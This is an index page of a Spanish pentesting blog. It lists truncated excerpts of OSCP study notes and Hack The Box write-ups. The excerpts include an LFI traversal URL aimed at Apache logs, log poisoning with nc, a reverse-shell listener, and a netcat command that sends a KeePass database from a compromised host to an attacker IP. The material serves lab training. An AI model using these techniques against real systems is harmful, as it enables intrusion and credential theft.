by Ric | Jan 13, 2020 | Blog, Herramientas / tools, OSCP
SNMP significa Simple Network Management Protocol. Sirve para intercambiar instrucciones o configuraciones entre dispositivos. SNMP puede tener leer commands o escribir commands. SNMP viene en tres versions SNMP1 Es el mas vulnerable y todo lo maneja en plaintext...
by Ric | Jan 13, 2020 | Blog, Herramientas / tools, OSCP
Asumire que todos sabemos que es powershell pero en resumen es una shell que se encuentra en windows 7 para adelante. Pero cuales son sus ventajas para un pentester? Powershell puede descargar y ejecutar codigo desde la memoria. Lo cual es bueno porque no deja tanto...
by Ric | Jan 11, 2020 | Blog, Herramientas / tools, OSCP
NetBIOS “Network Basic Input/Output System”, es, (en sentido estricto) una especificación de interfaz para acceso a servicios de red, es decir, una capa de software desarrollado para enlazar un sistema operativo de red con hardware específico. Ejemplos de...
by Ric | Dec 8, 2019 | Blog, Herramientas / tools
Algunas veces y por diferentes motivos puedes acceder a los logs. Un ejemplo muy típico son los access logs via LFI. http://IP/xyz.php?page=../../../../../%20../../xampp/apache/logs/access.log%00 Puedes infectar los access logs muy fácil con nc root@kali:~# nc -nv...
by Ric | Nov 24, 2019 | Blog, Herramientas / tools, OSCP
Pasar archivos de Linux (Kali) a Windows puede ser un problema durante un pentest. Claramente no puedes solo llegar con un USB ja. Hoy les mostraré mi método favorito. Usaremos Impacket más concretamente “impacket-smbserver” para hacer un share desde donde...
by Ric | Nov 23, 2019 | Herramientas / tools, OSCP
Preguntas iniciales. Qué arquitectura de Windows es? 32? 1 Replica el crash https://lingojam.com/ByteCounter 2 Velo en Wirershark y en el debugger 3 Replicalo en python con el fuzzer para encontrar el numero del crash #!/usr/bin/env python2 import socket # Generate an...
by Ric | Nov 21, 2019 | Herramientas / tools, OSCP
Cuando estas haciendo el buffer overflow the OSCP tienes que encontrar Bad characters. He escuchado que mucha gente se le complica este paso porque lo hace manualmente. Gracias a Mona hay una forma de hacerlo “semi automático”. Primero, haz un script para...
by Ric | Nov 18, 2019 | Blog, Herramientas / tools, OSCP
En el curso de OSCP descubrí una joya. Es una simplificador de MSFvenom A quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework). Se llama MSFvenom Payload Creator (MSFPC) Lo único que necesitas poner es...
by Ric | Nov 9, 2019 | Blog, Herramientas / tools, OSCP
PDF aquí: PowerShellCheatSheet_v41
by Ric | Nov 6, 2019 | Blog, Herramientas / tools
Domain fronting is a technique that circumvents internet censorship by leveraging the certificates and request forwarding systems of large hosting providers to use different domain names at different communication layers of HTTPS connections with servers and...
by Ric | Nov 4, 2019 | Blog, Herramientas / tools, OSCP
Ya había hecho esta maquina pero con mucho mucho Metasploit. La verdad es que solo para OSCP tiene sentido no usar metasploit para eternal blue ha. Lo bueno es que descubrí un script que es casi igual de maravilloso. Como siempre empezamos con un nmap (en este caso...
by Ric | Nov 3, 2019 | Blog, Herramientas / tools, OSCP
Esta es la segunda vez que hago esto pero esta vez sin metasploit. Lo primero que nos damos cuenta con el nmap es que esta FTP con acceso anónimo y el asp root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-03 19:39...
by Ric | Nov 3, 2019 | Herramientas / tools, OSCP
Siempre que corro watson o busco en google Systeminfo de windows es un dolor de cabeza encontrar priv escalation. https://github.com/abatchy17/WindowsExploits pero esta pagina tiene bastantes aunque solo debes correrlos en CTF sistems. Nunca en clientes ja 🙂 MS03-026...
by Ric | Nov 2, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina funciona con Windows. Hay que tener mucho cuidado con el encoding. No me estaba funcionando por eso. Como siempre empezamos con un Nmap root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET Nmap...
by Ric | Oct 30, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina se me hizo muy interesante porque use mucho windows. Tuve que usar otros métodos alternativos para evitar metasploit. Empezamos con Nmap y vemos el puerto 8500 Nmap scan report for 10.10.10.11 Host is up (0.065s latency). Not shown: 997 filtered ports...
by Ric | Oct 29, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina estuvo interesante porque tenias que hacer muchas cosas chiquitas para lograr tu objetivo. Entre ellas agregar el host, y hackear DNS por que las herramientas normales no funcionaban. Empezamos con un NMAP root@Kali2:~# nmap -sC -sV 10.10.10.13 Starting...
by Ric | Oct 28, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un nmap. Esta maquina fue muy interesante porque se juntaron demasiadas vulnerabilidades y configuraciones extrañas como port knocking. root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43 Starting Nmap 7.70 ( https://nmap.org ) at...
by Ric | Oct 27, 2019 | Blog, Herramientas / tools, OSCP
Hay algunas veces que la shell que tenemos esta muy limitada y no podemos hacer cosas como usar las flechitas, no hay tab ni su. Ahora como arreglarlo? Si la maquina tiene python es sencillo root@Kali2:~/Desktop# nc -lvnp 1234 listening on [any] 1234 … connect...
by Ric | Oct 26, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de las boxes más complejas que he hecho. Sobretodo porque no tengo tanta experiencia en windows. Como siempre empezamos con un Nmap root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST...
by Ric | Oct 22, 2019 | Blog, Herramientas / tools, OSCP
Como siempre comenzamos con un nmap pero no hay mucho 80 y 443. Como es una web application corremos dirbuster. En este caso con una extension que no uso normalmente txt. Eso encuentra el archivo https://10.10.10.60/system-users.txt ####Support ticket### Please create...
by Ric | Oct 21, 2019 | Blog, Herramientas / tools, OSCP
Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante...
by Ric | Oct 20, 2019 | Blog, Herramientas / tools, OSCP
Es el mejor invento del año. Agarraron la descripción de todos los videos de IppSec y los indexaron. Por ejemplo, si te encuentras kdbx y no sabes que es puedes verlo en videos. Lo mejor es que los links te llevan diréctamnete a ellos. https://ippsec.rocks...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins. Nmap scan report for 10.10.10.63 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de mis maquinas favoritas. Aprendí mucho y estuvo muy interesante. Como siempre empezamos con un Nmap rápido root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 16:12 CEST Nmap scan report for...